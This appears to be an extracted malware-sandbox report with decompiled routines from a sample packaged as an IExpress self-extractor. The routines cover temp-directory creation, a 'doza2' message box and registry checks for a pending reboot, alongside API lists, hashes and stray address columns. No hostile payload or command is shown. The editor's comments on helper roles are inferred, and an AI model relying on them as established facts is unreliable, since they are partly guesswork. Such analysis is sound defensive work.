                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004056ae
                                                                                                                                                                                                                                    0x004056ae
                                                                                                                                                                                                                                    0x004056b9
                                                                                                                                                                                                                                    0x004056bf
                                                                                                                                                                                                                                    0x004056c1
                                                                                                                                                                                                                                    0x004056f3
                                                                                                                                                                                                                                    0x004056f3
                                                                                                                                                                                                                                    0x00405705
                                                                                                                                                                                                                                    0x0040570a
                                                                                                                                                                                                                                    0x00405711
                                                                                                                                                                                                                                    0x00405717
                                                                                                                                                                                                                                    0x00405724
                                                                                                                                                                                                                                    0x00405726
                                                                                                                                                                                                                                    0x00405729
                                                                                                                                                                                                                                    0x00405730
                                                                                                                                                                                                                                    0x00405737
                                                                                                                                                                                                                                    0x0040573d
                                                                                                                                                                                                                                    0x00405740
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040572b
                                                                                                                                                                                                                                    0x0040572b
                                                                                                                                                                                                                                    0x0040572e
                                                                                                                                                                                                                                    0x00405742
                                                                                                                                                                                                                                    0x00405742
                                                                                                                                                                                                                                    0x00405745
                                                                                                                                                                                                                                    0x0040576b
                                                                                                                                                                                                                                    0x0040576b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405747
                                                                                                                                                                                                                                    0x00405747
                                                                                                                                                                                                                                    0x0040574d
                                                                                                                                                                                                                                    0x0040574f
                                                                                                                                                                                                                                    0x00405771
                                                                                                                                                                                                                                    0x00405771
                                                                                                                                                                                                                                    0x00405773
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405751
                                                                                                                                                                                                                                    0x00405751
                                                                                                                                                                                                                                    0x00405753
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405755
                                                                                                                                                                                                                                    0x0040575b
                                                                                                                                                                                                                                    0x00405760
                                                                                                                                                                                                                                    0x00405762
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405764
                                                                                                                                                                                                                                    0x00405764
                                                                                                                                                                                                                                    0x00405769
                                                                                                                                                                                                                                    0x0040577e
                                                                                                                                                                                                                                    0x0040577e
                                                                                                                                                                                                                                    0x00405781
                                                                                                                                                                                                                                    0x00405788
                                                                                                                                                                                                                                    0x0040578d
                                                                                                                                                                                                                                    0x0040578f
                                                                                                                                                                                                                                    0x004057b2
                                                                                                                                                                                                                                    0x004057b8
                                                                                                                                                                                                                                    0x004057bd
                                                                                                                                                                                                                                    0x004057bf
                                                                                                                                                                                                                                    0x004057cd
                                                                                                                                                                                                                                    0x004057cd
                                                                                                                                                                                                                                    0x004057dd
                                                                                                                                                                                                                                    0x004057e3
                                                                                                                                                                                                                                    0x004057ef
                                                                                                                                                                                                                                    0x004057f5
                                                                                                                                                                                                                                    0x004057f8
                                                                                                                                                                                                                                    0x0040580a
                                                                                                                                                                                                                                    0x0040580a
                                                                                                                                                                                                                                    0x004057fa
                                                                                                                                                                                                                                    0x00405802
                                                                                                                                                                                                                                    0x00405802
                                                                                                                                                                                                                                    0x0040580d
                                                                                                                                                                                                                                    0x0040580f
                                                                                                                                                                                                                                    0x00405830
                                                                                                                                                                                                                                    0x00405836
                                                                                                                                                                                                                                    0x0040583d
                                                                                                                                                                                                                                    0x0040584b
                                                                                                                                                                                                                                    0x00405851
                                                                                                                                                                                                                                    0x00405855
                                                                                                                                                                                                                                    0x0040585a
                                                                                                                                                                                                                                    0x0040585c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040585e
                                                                                                                                                                                                                                    0x0040585e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040585e
                                                                                                                                                                                                                                    0x00405811
                                                                                                                                                                                                                                    0x00405817
                                                                                                                                                                                                                                    0x00405819
                                                                                                                                                                                                                                    0x0040581f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040581f
                                                                                                                                                                                                                                    0x00405791
                                                                                                                                                                                                                                    0x00405797
                                                                                                                                                                                                                                    0x0040579c
                                                                                                                                                                                                                                    0x0040579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004057a0
                                                                                                                                                                                                                                    0x004057a9
                                                                                                                                                                                                                                    0x004057ae
                                                                                                                                                                                                                                    0x004057b0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004057b0
Control-flow graph node addresses (the graph rendering itself did not survive extraction; 0x00000000 entries are empty rows): 0x0040579e, 0x00000000, 0x00000000, 0x00000000, 0x00405769, 0x00405762, 0x00405753, 0x0040574f, 0x00000000, 0x00000000, 0x00000000, 0x0040572e, 0x00000000, 0x00405864, 0x00405864, 0x00405864, 0x00405717, 0x00000000, 0x004056c3, 0x004056c5, 0x004056c9, 0x004056ce, 0x004056d0, 0x00000000, 0x004056d6, 0x004056d6, 0x004056d8, 0x004056dd, 0x004056df, 0x00000000, 0x004056e1, 0x004056e2, 0x004056e4, 0x004056e6, 0x004056eb, 0x004056ed, 0x00000000, 0x004056f3, 0x004056f3, 0x00000000, 0x0040586c, 0x00405878, 0x0040587e, 0x00405882, 0x00405883, 0x00405889, 0x0040588e, 0x0040588e, 0x00000000, 0x00405896, 0x004056ed, 0x004056df, 0x004056d0, 0x004056c1, 0x004056a8, 0x0040565b, 0x0040565b, 0x0040565d, 0x00405669, 0x00405669, 0x0040565f, 0x0040565f, 0x00405665, 0x00405667, 0x00000000, 0x00000000, 0x00405667, 0x0040566c, 0x00405673, 0x00405678, 0x0040567a, 0x0040589b, 0x0040589b, 0x00405680, 0x00405685, 0x0040568c, 0x00000000, 0x0040568c, 0x0040567a, 0x0040560e, 0x00405613, 0x0040561a, 0x00405620, 0x00405626, 0x00000000, 0x00405626, 0x004055db, 0x004055e0, 0x004055e7, 0x004055f1, 0x004055f6, 0x004055f6, 0x004055f6, 0x004058b7, 0x004058c7

APIs
  • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
  • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
  • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
  • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
  • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
  • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
  • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 004055CF
• lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00405638
• LocalFree.KERNEL32(00000000), ref: 0040564C
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00405620
  • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
  • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
  • Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285
• GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 004056B9
• GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0040571E
• GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00405737
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 004057CD
• GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 004057EF
• CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00405802
  • Part of subcall function 00402630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00402654
• SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00405830
  • Part of subcall function 00406517: FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
  • Part of subcall function 00406517: LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
  • Part of subcall function 00406517: DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
  • Part of subcall function 00406517: FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00405878
  • Part of subcall function 0040597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 004059A8
  • Part of subcall function 0040597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 004059AF
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
• String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
• API String ID: 2436801531-3855382519
• Opcode ID: 4971864637cee8b0fcbe78389781779da4c8e8b84f5700c2434fd0c7404e9403
• Instruction ID: d5c9d26d297622afc2c63048806d0aa51a227b55250bd62e7bce8c8ac459e010
• Opcode Fuzzy Hash: 4971864637cee8b0fcbe78389781779da4c8e8b84f5700c2434fd0c7404e9403
• Instruction Fuzzy Hash: FE810871A046085ADB20AB319D45BEB726DDB50304F0444BBF986F32D1DF7C8D828E5D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E004044B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                                                    				char _v576;
                                                                                                                                                                                                                                    				void* _v580;
                                                                                                                                                                                                                                    				struct HWND__* _v584;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                                                                                                    				_t34 =  *0x408004; // 0x8f135e3b
                                                                                                                                                                                                                                    				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                    				_v584 = __ecx;
                                                                                                                                                                                                                                    				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                    				_t67 = _a4;
                                                                                                                                                                                                                                    				_t69 = 0xd;
                                                                                                                                                                                                                                    				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                    				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                    				_v580 = _t37;
                                                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                                                    				if(( *0x408a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                    					_t39 = 1;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_v576 = 0;
                                                                                                                                                                                                                                    					LoadStringA( *0x409a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                                                                                                                    						_t73 =  &_v576;
                                                                                                                                                                                                                                    						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                    						_t75 = _t16;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t43 =  *_t73;
                                                                                                                                                                                                                                    							_t73 = _t73 + 1;
                                                                                                                                                                                                                                    						} while (_t43 != 0);
                                                                                                                                                                                                                                    						_t84 = _v580;
                                                                                                                                                                                                                                    						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                                                    								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                    								_t83 = _t27;
                                                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t75 = _t83;
                                                                                                                                                                                                                                    									_t74 = _t80;
                                                                                                                                                                                                                                    									E00401680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t76 = _t67;
                                                                                                                                                                                                                                    								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                    								_t85 = _t24;
                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                    									_t55 =  *_t76;
                                                                                                                                                                                                                                    									_t76 = _t76 + 1;
                                                                                                                                                                                                                                    								} while (_t55 != 0);
                                                                                                                                                                                                                                    								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                    								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									E0040171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t77 = _t67;
                                                                                                                                                                                                                                    							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                    							_t81 = _t18;
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t58 =  *_t77;
                                                                                                                                                                                                                                    								_t77 = _t77 + 1;
			} while (_t58 != 0);
			_t75 = _t77 - _t81;
			_t82 = _t84 + 1;
			do {
				_t59 =  *_t84;
				_t84 = _t84 + 1;
			} while (_t59 != 0);
			_t21 = _t74 + 0x64; // 0x65
			_t83 = _t21 + _t84 - _t82 + _t75;
			_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
			_t80 = _t44;
			if(_t80 == 0) {
				goto L6;
			} else {
				_push(_v580);
				E0040171E(_t80, _t83,  &_v576, _t67);
				L23:
				MessageBeep(_a12);
				if(E0040681F(_t67) == 0) {
					L25:
					_t49 = 0x10000;
				} else {
					_t54 = E004067C9(_t74, _t74);
					_t49 = 0x190000;
					if(_t54 == 0) {
						goto L25;
					}
				}
				_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16); // executed
				_t83 = _t52;
				LocalFree(_t80);
				_t39 = _t52;
			}
		}
	} else {
		if(E0040681F(_t67) == 0) {
			L4:
			_t64 = 0x10010;
		} else {
			_t66 = E004067C9(0, 0);
			_t64 = 0x190010;
			if(_t66 == 0) {
				goto L4;
			}
		}
		_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
		L6:
		_t39 = _t44 | 0xffffffff;
	}
}
return E00406CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
}

                                                                                                                                                                                                                                    0x00404675
                                                                                                                                                                                                                                    0x00404675
                                                                                                                                                                                                                                    0x004045ad
                                                                                                                                                                                                                                    0x00404527
                                                                                                                                                                                                                                    0x0040452e
                                                                                                                                                                                                                                    0x0040453f
                                                                                                                                                                                                                                    0x0040453f
                                                                                                                                                                                                                                    0x00404530
                                                                                                                                                                                                                                    0x00404531
                                                                                                                                                                                                                                    0x00404538
                                                                                                                                                                                                                                    0x0040453d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040453d
                                                                                                                                                                                                                                    0x00404554
                                                                                                                                                                                                                                    0x0040455a
                                                                                                                                                                                                                                    0x0040455a
                                                                                                                                                                                                                                    0x0040455a
                                                                                                                                                                                                                                    0x00404525
                                                                                                                                                                                                                                    0x0040468c

APIs
• LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
• MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
• LocalAlloc.KERNEL32(00000040,00000065), ref: 004045A3
• LocalAlloc.KERNEL32(00000040,00000065), ref: 004045E3
• LocalAlloc.KERNEL32(00000040,00000002), ref: 0040460D
• MessageBeep.USER32(00000000), ref: 00404630
• MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00404666
• LocalFree.KERNEL32(00000000), ref: 0040466F
  • Part of subcall function 0040681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0040686E
  • Part of subcall function 0040681F: GetSystemMetrics.USER32(0000004A), ref: 004068A7
  • Part of subcall function 0040681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004068CC
  • Part of subcall function 0040681F: RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,?,0000000C), ref: 004068F4
  • Part of subcall function 0040681F: RegCloseKey.ADVAPI32(?), ref: 00406902
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
• String ID: LoadString() Error. Could not load string resource.$doza2
• API String ID: 3244514340-3130468218
• Opcode ID: c9d5c5b1e490d48041246102af90d95d94e3abacc0a213a657fe916465fb66f7
• Instruction ID: f9d95c897c3f9acb34889c8f4230c3a0684cd2a5052bf7c23177ba80834ac1ca
• Opcode Fuzzy Hash: c9d5c5b1e490d48041246102af90d95d94e3abacc0a213a657fe916465fb66f7
• Instruction Fuzzy Hash: 61510BB1900215AFDB219F28CD48BA77B68EF85304F1045BAFE45B7281DB3ADD15CB58
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 95%
// Decompiled routine: creates a private working directory named IXP%03d.TMP
// below the base directory passed in __ecx, writing the resulting path to __edx.
// Comments added by the editor; helper names E004xxxxx are the decompiler's and
// their roles below are inferred from how they are called.
E004053A1(CHAR* __ecx, CHAR* __edx) {
	signed int _v8;        // stack cookie copy
	char _v268;            // 0x104-byte buffer for the "IXP%03d.TMP" name
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t5;
	long _t13;
	int _t14;
	CHAR* _t20;            // base directory (__ecx)
	int _t29;              // counter for the IXP%03d.TMP suffix
	int _t30;              // return value: 1 on success, 0 on failure
	CHAR* _t32;            // output path buffer (__edx)
	signed int _t33;
	void* _t34;

	_t5 =  *0x408004; // 0x8f135e3b, stack-cookie seed
	_v8 = _t5 ^ _t33;
	_t32 = __edx;
	_t20 = __ecx;
	_t29 = 0;
	while(1) {
		// printf-style formatting helper (inferred): _v268 = "IXP000.TMP", "IXP001.TMP", ...
		E0040171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
		_t34 = _t34 + 0x10;
		_t29 = _t29 + 1;
		// Copy the base directory into the output buffer and append the candidate name (inferred).
		E00401680(_t32, 0x104, _t20);
		E0040658A(_t32, 0x104,  &_v268); // executed
		// Clear a stale, empty directory of the same name, then test whether the path is now free.
		RemoveDirectoryA(_t32); // executed
		_t13 = GetFileAttributesA(_t32); // executed
		if(_t13 == 0xffffffff) { // INVALID_FILE_ATTRIBUTES: name is unused, create it below
			break;
		}
		if(_t29 < 0x190) { // try up to 400 (0x190) candidate names
			continue;
		}
		L3:
		// Fallback: let the system pick a unique "IXP" temp name, then swap the file for a directory.
		_t30 = 0;
		if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
			_t30 = 1;
			DeleteFileA(_t32);
			CreateDirectoryA(_t32, 0);
		}
		L5:
		// Epilogue with stack-cookie check (inferred from the _v8 ^ _t33 argument).
		return E00406CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
	}
	_t14 = CreateDirectoryA(_t32, 0); // executed
	if(_t14 == 0) {
		goto L3; // creation failed, use the GetTempFileNameA fallback
	}
	_t30 = 1;
	 *0x408a20 = 1; // global flag: IXP%03d.TMP directory was created
	goto L5;
}
                                                                                                                                                                                                                                    0x00405416
                                                                                                                                                                                                                                    0x00405427
                                                                                                                                                                                                                                    0x0040542a
                                                                                                                                                                                                                                    0x0040542b
                                                                                                                                                                                                                                    0x00405434
                                                                                                                                                                                                                                    0x00405434
                                                                                                                                                                                                                                    0x0040543a
                                                                                                                                                                                                                                    0x0040544c
                                                                                                                                                                                                                                    0x0040544c
                                                                                                                                                                                                                                    0x00405452
                                                                                                                                                                                                                                    0x0040545a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040545e
                                                                                                                                                                                                                                    0x0040545f
                                                                                                                                                                                                                                    0x00000000

APIs
• Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750
• RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053FB
• GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405402
• GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040541F
• DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040542B
• CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405434
• CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405452
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
• API String ID: 1082909758-3862032828
• Opcode ID: 43f651f3391ef192c497bfbc0c6e30c6af2b5fc786458bd32b7fff1cca5d2d8e
• Instruction ID: 125cfa7c81adbab0fbf8f7f76c25cee134d25006f7ef051e404a57ef8c01fb33
• Opcode Fuzzy Hash: 43f651f3391ef192c497bfbc0c6e30c6af2b5fc786458bd32b7fff1cca5d2d8e
• Instruction Fuzzy Hash: F711047170060467E3209F269D49FEF366DEBC1315F00013ABA46F22E0CE7889568AAE

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 563 40256d-40257d 564 402622-402627 call 4024e0 563->564 565 402583-402589 563->565 570 402629-40262f 564->570 566 4025e8-402607 RegOpenKeyExA 565->566 567 40258b 565->567 571 4025e3-4025e6 566->571 572 402609-402620 RegQueryInfoKeyA 566->572 569 402591-402595 567->569 567->570 569->570 574 40259b-4025ba RegOpenKeyExA 569->574 571->570 575 4025d1-4025dd RegCloseKey 572->575 574->571 576 4025bc-4025cb RegQueryValueExA 574->576 575->571 576->575
C-Code - Quality: 86%
			// Decompiled from the sample (Joe Sandbox IDA plugin output; comments added).
			// Mode selector in the low 16 bits of ECX: 0 -> E004024E0; 1 -> number of values
			// under the legacy FileRenameOperations key; 2..3 -> byte size of the
			// PendingFileRenameOperations value. A non-zero return means file operations
			// are queued for the next reboot (the usual "reboot pending" test).
			E0040256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;
			
				_push(__ecx); // two pushes reserve the 8 bytes of locals (_v8, _v12)
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E004024E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						// 0x80000002 == HKEY_LOCAL_MACHINE, 0x20019 == KEY_READ
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							// 8th argument (lpcValues) receives the number of values under the key
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								// NULL data buffer: lpcbData (_v8) receives the size of the REG_MULTI_SZ value
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								// neg/sbb/not/and idiom: keep _v8 only when _t19 == ERROR_SUCCESS, else zero it
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12; // unreachable; decompiler artifact
			}
Instruction addresses of the decompiled statements above, in order: 0x00402572 0x00402573 0x00402575 0x00402578 0x0040257d 0x00402627 0x00402583 0x00402586 0x00402589 0x004025eb 0x00402607 0x00000000 0x00402609 0x0040261a 0x00000000 0x0040261a 0x00000000 0x0040258b 0x0040258b 0x0040259e 0x004025b2 0x004025ba 0x004025cb 0x004025d1 0x004025d6 0x004025da 0x004025dd 0x004025dd 0x004025e3 0x004025e3 0x004025e3 0x0040258b
                                                                                                                                                                                                                                    0x00402589
                                                                                                                                                                                                                                    0x0040262f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00404096,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?), ref: 004025B2
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?,00404096), ref: 004025CB
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00401ED3,00000001,00000000,?,?,00404137,?,00404096), ref: 004025DD
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00404096,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?), ref: 004025FF
                                                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00404096,00000000,00000000,00000000,00000000,?,00401ED3,00000001,00000000), ref: 0040261A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 004025F5
